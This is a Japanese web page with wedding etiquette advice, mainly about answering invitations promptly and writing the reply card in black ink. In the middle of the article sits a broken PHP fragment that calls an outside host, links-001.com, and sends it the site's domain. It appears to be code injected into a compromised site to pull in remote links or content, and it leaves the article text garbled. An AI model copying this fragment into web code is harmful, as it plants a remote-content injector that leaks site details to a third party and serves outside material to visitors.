前へ
次へ

結婚式のマナーでテーブルマナーに注目

結婚式のマナーをしっかりと考えて、テーブルマナーの基礎知識や食事の仕方をきちんと学ぶことも大事なポイ

more

結婚式のマナーは大切です

結婚式のマナーとしてまず注意したいのは、式場に行く際に遅刻をしないということです。
また、新郎

more

結婚式のマナーを守って出席しましょう

結婚式にお呼ばれしたときは、結婚式のマナーを守りましょう。
まず、結婚式に出席するときは、絶対

more

披露宴に出席するための結婚式のマナー

これから結婚式の披露宴に出席を予定されている方々も多いのではないでしょうか。
今日はそれらの人々のために筆を執ります。
題名は結婚式のマナーです。
結婚式の披露宴に出席するためには結婚式のマナーというものを守らなければなりません。
一口にそう言われても、それにはいくつかの種類があります。
最初から順を追って振り返ってみましょう。
まず結婚式の披露宴の予定が確定すれば、招待状というものが届けられます。
その招待状に返信する際にマナーがあります。
結婚式の招待状が届いたらマナーとして必ず記載されている期日までに返信することです。
それをしないと結婚式の披露宴に招待されるゲストの人数が把握できないからです。
それでは予算も立てることができないということになってしまいます。
招待状の返信マナーとして一番大切なのが約束の期日までに必ず返信するということです。
それであなたの信用度は増すのです。
出欠の返信は早ければ早いほど良いということができます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

結婚式の招待状が届いたらできるだけ早急に返信するのが良いのです。
2日も3日もほったらかしにしておくのは最悪です。
披露宴に出席したいのだけれども、自分の予定がはっきりしないという人もいます。
そういう人たちの取れる手段は限られます。
電話を使いましょう。
電話でその理由を説明しておくのです。
そうすれば相手も必ず納得してくれるはずです。
その電話さえ入れておけば、たとえ返信が遅くなったとしても問題がないということになります。
結婚式の招待状の返信ハガキは正しく記入する必要があります。
黒色のペンを使って記入するのが基本的なマナーです。
間違っても赤色や緑色のボールペンで記入してはなりません。
結婚式のマナーとしては黒色のボールペンを使って記入するのが一番正しい方法です。
また正式なのは毛筆や万年筆です。
ですが今はボールペンがこれだけ世の中に浸透している時代ですから、書き慣れたボールペンで記入することはまったく問題がありません。
お幸せに。

Page Top